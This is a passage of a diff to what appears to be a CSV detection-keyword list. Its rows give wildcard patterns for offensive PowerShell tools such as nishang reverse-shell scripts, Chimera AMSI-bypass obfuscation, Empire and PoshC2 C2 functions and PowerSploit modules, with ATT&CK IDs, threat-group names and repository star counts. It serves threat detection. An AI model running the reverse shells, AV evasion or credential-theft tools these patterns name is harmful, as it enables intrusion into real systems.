T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*Invoke-PowerShellTcpOneLine*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-PowerShellTcpOneLine.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*Invoke-PowerShellTcpOneLineBind*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-PowershellTranscriptionCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-PowerShellUdp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-PowerShellUdp.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*Invoke-PowerShellUdpOneLine*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-PowerShellUdpOneLine.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*Invoke-PowerShellWmi*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PowerShellTcp.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-PowerShellTcpOneLine*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PowerShellTcpOneLine.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-PowerShellTcpOneLineBind*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PowershellTranscriptionCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-PowerShellUdp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PowerShellUdp.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-PowerShellUdpOneLine*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PowerShellUdpOneLine.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-PowerShellWmi*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*Invoke-PowerThIEf*","offensive_tool_keyword","Invoke-PowerThIEf","An IE Post Exploitation Library released at Steelcon in Sheffield 7th July 2018.","T1027 - T1053 - T1114 - T1059 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/nettitude/Invoke-PowerThIEf","1","0","N/A","N/A","2","127","27","2018-09-12T11:26:06Z","2018-07-10T09:14:58Z" -"*Invoke-PPLDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Prasadhak*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PPLDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Prasadhak*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*Invoke-PrintDemon*","offensive_tool_keyword","Invoke-PrintDemon","This is an PowerShell Empire launcher PoC using PrintDemon and Faxhell. The module has the Faxhell DLL already embedded which leverages CVE-2020-1048 for privilege escalation. The vulnerability allows an unprivileged user to gain system-level privileges and is based on @ionescu007 PoC.","T1204 - T1208 - T1216 - T1055 - T1203","TA0001 - TA0007 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/BC-SECURITY/Invoke-PrintDemon","1","1","N/A","N/A","2","193","41","2020-10-17T17:04:24Z","2020-05-15T05:14:49Z" -"*Invoke-PrintNightmareCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-Privesc*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-PrivescAudit*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-PrintNightmareCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Privesc*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-PrivescAudit*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-PrivescCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-PrivescCheck.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*invokeprocesshunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-ProcessHunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" -"*Invoke-ProcessHunter*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-ProcessHunter*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*invoke-processhunter*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z" "*Invoke-ProcessScan*","offensive_tool_keyword","Invoke-ProcessScan","This script uses a list from the Equation Group leak from the shadow brokers to provide context to executeables that are running on a system.","T1059.001 - T1016 - T1547.001","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/vysecurity/Invoke-ProcessScan","1","1","N/A","N/A","1","42","22","2017-06-05T12:19:25Z","2017-06-03T18:36:30Z" "*InvokePS1.bat*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*Invoke-ps2exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*Invoke-ps2exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" "*Invoke-PSAmsiScan*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" -"*Invoke-PsExec*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PsExec*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PSexec.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-PsExec.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1095","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*invoke-psexecpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-PsGcat*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-PsGcatAgent*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PsExec.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1095","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*invoke-psexecpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-PsGcat*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PsGcatAgent*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 